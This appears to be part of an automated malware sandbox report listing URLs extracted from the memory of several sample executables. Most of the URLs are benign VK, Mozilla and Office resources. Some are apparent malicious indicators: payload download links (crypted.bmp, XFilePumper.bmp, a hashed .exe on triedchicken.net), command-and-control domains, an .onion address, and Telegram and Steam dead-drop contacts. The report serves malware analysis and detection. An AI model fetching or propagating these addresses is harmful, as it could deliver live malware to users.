Source: i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/intersection_observer.16f109db.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/jobs_devtools_notification.14f96f02.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/likes.20074c02.css
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/likes.bf816bb7.js
Source: i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/other_functions.51a32a3f.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/page_layout.698588ea.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/performance_observers.97fec0a1.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/raven_logger.ea0a2239.js
Source: i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/resize_observer.1b8bfa1e.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/sentry.isolated.f5ae92db.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/site_layout.20074c02.css
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/site_layout.82658390.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/ui_common.20074c02.css
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/ui_common.e707a2c7.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/unauthorized.20074c02.css
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/unauthorized.8700b9b6.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/vk_sans_observer.fb28db65.js
Source: i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.vk.me
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A52000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stats.vk-portal.net
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statstraffic.org
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statstraffic.orgCaptionMicrosoft
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C044000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statstraffic.orgMicrosoft
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C07A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statstraffic.orghttp://2pkktxkf3gnpcjh2bhi62arz2ieyjgxocb3jne3kc2nu2yvyxqq23nad.onionCommonP
Source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2297037151.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2290949834.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715
Source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2297037151.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2290949834.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715https://t.me/sa9okRed
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623CF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-20.userapi.com/
Source: i1crvbOZAP.exe, 00000000.00000003.1724320635.0000029625C15000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1754597520.0000029625BD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1779272376.0000029625BCE000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625A52000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1727907972.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1961249702.0000029625A96000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1754597520.0000029625BCE000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1725574620.0000029625BE5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963499955.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AD2000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625A5A000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1725574620.0000029625BDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-20.userapi.com/c237131/u329118071/docs/d54/a41cd49a4cc3/sm.bmp?extra=YhKLSKJ3mgzcHEPhKt
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-21.userapi.com/
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C8F000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1959313300.0000029623C8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-21.userapi.com/SJ
Source: i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B70000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1967274708.0000029626162000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625A9F000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-21.userapi.com/c240331/u329118071/docs/d55/1831d7ba0e1f/crypted.bmp?extra=HVpBxhMcgZ3WE
Source: i1crvbOZAP.exe, 00000000.00000003.1724320635.0000029625C15000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1726556664.0000029625D0D000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B70000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AA9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1725574620.0000029625BFD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1754394545.0000029625BFE000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1727885732.0000029625C06000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1729367177.0000029625C05000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1738018561.0000029625C06000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745469959.0000029625D0B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AB1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-21.userapi.com/c909328/u329118071/docs/d30/0bb5ce760b73/XFilePumper.bmp?extra=LfaiwsuY5
Source: i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-22.userapi.com/
Source: i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-22.userapi.com/?F
Source: i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-22.userapi.com/EL
Source: i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-22.userapi.com/My
Source: i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-22.userapi.com/c909218/u329118071/docs/d56/4889f8ef891f/crypted.bmp?extra=-LBKaniv3MRw0
Source: i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-22.userapi.com/dll.exeEL
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2358233461.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2358233461.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000003.2010572259.00000000212FD000.00000004.00000020.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000003.2010572259.00000000212FD000.00000004.00000020.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000002.2620868713.0000000001E1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot
Source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2297037151.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2290949834.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sa9ok
Source: i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tagmanager.google.com
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telegram.org
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C016000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://thestatsfiles.ruhttps://thestatsfiles.ruRegQueryValueExW
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C016000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://thestatsfiles.ruhttps://thestatsfiles.ruRegQueryValueExWUUIDPGDSE
Source: i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ton.twimg.com
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com
Source: i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963499955.0000029625ACC000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AC4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1727907972.0000029625ACF000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/
Source: i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963499955.0000029625ACC000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AC4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/a
Source: i1crvbOZAP.exe, 00000000.00000003.1700891751.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623CF3000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1730559718.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1704990254.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1725963038.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685003043.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1959313300.0000029623CF6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1696637430.0000029625BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/cad54ba5b01423b1af8ec10ab5719d97.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/cad54ba5b01423b1af8ec10ab5719d97.exeC:
Source: i1crvbOZAP.exe, 00000000.00000003.1700891751.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1730559718.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1704990254.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1725963038.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685003043.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1696637430.0000029625BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/cad54ba5b01423b1af8ec10ab5719d97.exem
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623CF3000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1959313300.0000029623CF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/cad54ba5b01423b1af8ec10ab5719d97.exen
Source: i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net:80/cad54ba5b01423b1af8ec10ab5719d97.exe
Source: KUc3lCE6xAEEreIlM0ct4583.exe, KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
Source: i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com
